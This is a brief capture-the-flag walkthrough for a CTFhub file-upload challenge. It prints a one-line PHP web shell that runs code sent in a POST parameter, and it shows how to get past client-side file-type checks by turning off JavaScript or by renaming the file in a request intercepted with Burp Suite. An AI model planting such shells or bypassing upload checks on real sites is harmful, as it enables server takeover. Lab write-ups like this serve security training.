CTFhub—File upload (js front-end verification)
Article Directory
1. One-sent Trojan Horse
文件名为hack.php
<?php @eval($_POST['123']); ?>
Two, the idea of two methods
When we upload files, our client's javascript will check the file type, and only allow uploading of files with ".jpg", ".png" and ".gif"
Method 1. We can turn off the js front-end verification and prevent him from verifying, then we can directly upload a sentence of Trojan horse.
Method 2. Change the suffix of the one-sentence Trojan horse to the type allowed by verification, and then change the package after capturing the package through burpsuite
Three, method one step
Firefox—about:config (advanced preferences)
—Turn off JavaScript. After turning off JavaScript, there is no restriction on the file upload type. You can upload hack.php
directly and use Ant Sword or hackbar to get the flag.
Four, method two steps
Change the one-sentence Trojan horse hack.php to hack.jpg
browser settings proxy 127.0.0.1:8080
burpsuite opens the interception request,
intercepts the request package, changes the suffix of hack.jpg back to hack.php and then forwards (Forward) to
upload successfully. . .
Get the flag...